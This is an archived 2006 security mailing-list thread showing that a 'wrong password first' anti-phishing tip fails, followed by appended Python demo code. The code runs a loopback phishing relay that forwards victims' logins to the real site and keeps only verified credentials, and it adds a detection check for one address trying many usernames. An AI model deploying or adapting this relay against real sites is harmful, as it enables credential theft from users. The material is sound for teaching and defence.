Open Source and information security mailing list archives
Date: Fri Mar 31 15:32:09 2006
From: ross.thomson at capgemini.com (Thomson, Ross)
Subject: [HV-PAPER] Anti-Phishing Tips You Should Not Follow


I have seen one phishing site which did exactly that:

It tried to log in to the real site with the credentials you supplied; if it
returned a successful login, the userid/password was logged. If it returned
an 'access denied', the userid/password was not logged.


________________________________________________
Ross Thomson | Capgemini | Southbank
Anti-Virus Content Management | Outsourcing
Int: 700 3621 | Ext: + 44 (0)870 904 3621
ross.thomson@...gemini.com | www.capgemini.com
95-97 Wandsworth Road, London. SW8 2HG

Join the Collaborative Business Experience
________________________________________________


-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Jasper
Bryant-Greene
Sent: 31 March 2006 09:11
To: Marcos Agüero
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [Full-disclosure] [HV-PAPER] Anti-Phishing Tips You Should Not Follow

Marcos Agüero wrote:
> Michal Zalewski wrote:
>> On Fri, 31 Mar 2006 michaelslists@...il.com wrote:
>>
>>> If the website then presents you with the "Logon failed" page, you
>>> are possibly on a legitimate website, so you may proceed with
>>> logging in using your correct credentials. If it gets you right
>>> through - it is definitely a phishing attempt.
>> Note to self: design my next phishing website to always display
>> "logon failed".
> Just as most of the phishing sites already do.

Really? I thought they somehow magically knew enough about you to sign you
in properly and display all the correct details ;)

Seriously though, it wouldn't be that hard to forward the POST on to the
real bank website, would it?

--
Jasper Bryant-Greene
General Manager
Album Limited

http://www.album.co.nz/     0800 4 ALBUM
jasper@...um.co.nz          021 708 334

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

This message contains information that may be privileged or confidential and is the property of the Capgemini Group. It is intended only for the person to whom it is addressed. If you are not the intended recipient,  you are not authorized to read, print, retain, copy, disseminate,  distribute, or use this message or any part thereof. If you receive this  message in error, please notify the sender immediately and delete all  copies of this message.
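The relay the thread describes, as an added example that is not part of any message above: a "real" login endpoint and a phishing page that forwards each POST to it, mirrors the verdict back to the victim (so the "type a wrong password first" probe sees "Logon failed" exactly as the real site would show it), and keeps only the pairs the real site accepted. It also shows the one signal the real site does get from such a relay: every forwarded attempt arrives from the relay's own address, so one client tries many different usernames. The account, the victims, the form field names `user`/`pw`, the `/login` path and the loopback ports are all constructed assumptions for the demo.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from collections import defaultdict
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample data: one valid account on the "real" site.
REAL_ACCOUNTS = {"alice": "correct horse"}
# What the relay keeps: only pairs the real site accepted.
HARVESTED = []
# Real-site telemetry: distinct usernames attempted per client address.
USERS_SEEN_PER_SOURCE = defaultdict(set)
# Proxy-free opener so loopback calls are never routed via an env proxy.
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def _read_form(handler):
    """Parse the urlencoded login form (assumed field names: user, pw)."""
    length = int(handler.headers.get("Content-Length", "0"))
    form = urllib.parse.parse_qs(handler.rfile.read(length).decode())
    return form.get("user", [""])[0], form.get("pw", [""])[0]


def _reply(handler, status, text):
    data = text.encode()
    handler.send_response(status)
    handler.send_header("Content-Type", "text/plain")
    handler.send_header("Content-Length", str(len(data)))
    handler.end_headers()
    handler.wfile.write(data)


def _submit(url, user, pw):
    """POST credentials and return (status, body), including 4xx responses."""
    body = urllib.parse.urlencode({"user": user, "pw": pw}).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    try:
        with _OPENER.open(req) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


class RealSite(BaseHTTPRequestHandler):
    """The legitimate login endpoint."""

    def do_POST(self):
        user, pw = _read_form(self)
        USERS_SEEN_PER_SOURCE[self.client_address[0]].add(user)
        if REAL_ACCOUNTS.get(user) == pw:
            _reply(self, 200, "Welcome, " + user)
        else:
            _reply(self, 403, "Logon failed")

    def log_message(self, *args):
        pass  # keep the demo quiet


class PhishingRelay(BaseHTTPRequestHandler):
    """Forwards each POST to the real site and mirrors its verdict back."""
    real_url = None  # set by run_demo once the real site's port is known

    def do_POST(self):
        user, pw = _read_form(self)
        status, text = _submit(self.real_url, user, pw)
        if status == 200:
            HARVESTED.append((user, pw))  # verified credentials only
        _reply(self, status, text)  # victim sees exactly what the bank said

    def log_message(self, *args):
        pass


def suspicious_sources(min_distinct_users=3):
    """Real-site signal: one client address trying many different usernames."""
    return sorted(addr for addr, users in USERS_SEEN_PER_SOURCE.items()
                  if len(users) >= min_distinct_users)


def run_demo():
    """Run both servers on loopback, apply the 'wrong password first' tip
    against the relay, add two more victims, and return what each side saw."""
    HARVESTED.clear()
    USERS_SEEN_PER_SOURCE.clear()
    real = HTTPServer(("127.0.0.1", 0), RealSite)
    PhishingRelay.real_url = "http://127.0.0.1:%d/login" % real.server_address[1]
    relay = HTTPServer(("127.0.0.1", 0), PhishingRelay)
    for srv in (real, relay):
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    relay_url = "http://127.0.0.1:%d/login" % relay.server_address[1]
    try:
        first = _submit(relay_url, "alice", "wrong")           # the tip's probe
        second = _submit(relay_url, "alice", "correct horse")  # real credentials
        _submit(relay_url, "bob", "hunter2")                   # rejected, not logged
        _submit(relay_url, "carol", "letmein")                 # rejected, not logged
    finally:
        for srv in (relay, real):
            srv.shutdown()
            srv.server_close()
    return {"first": first, "second": second, "harvested": list(HARVESTED)}


if __name__ == "__main__":
    print(run_demo())
    print("addresses trying many usernames:", suspicious_sources())
```

The probe with the wrong password comes back as 403 "Logon failed" from the relay because that is what the real site answered, so the tip cannot distinguish the two. What the relay cannot hide is that the real site sees all of its victims' attempts from a single source address; `suspicious_sources()` flags that address once it has tried three distinct usernames, which is the kind of per-source telemetry a login endpoint can keep regardless of what the phishing page shows its victims.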
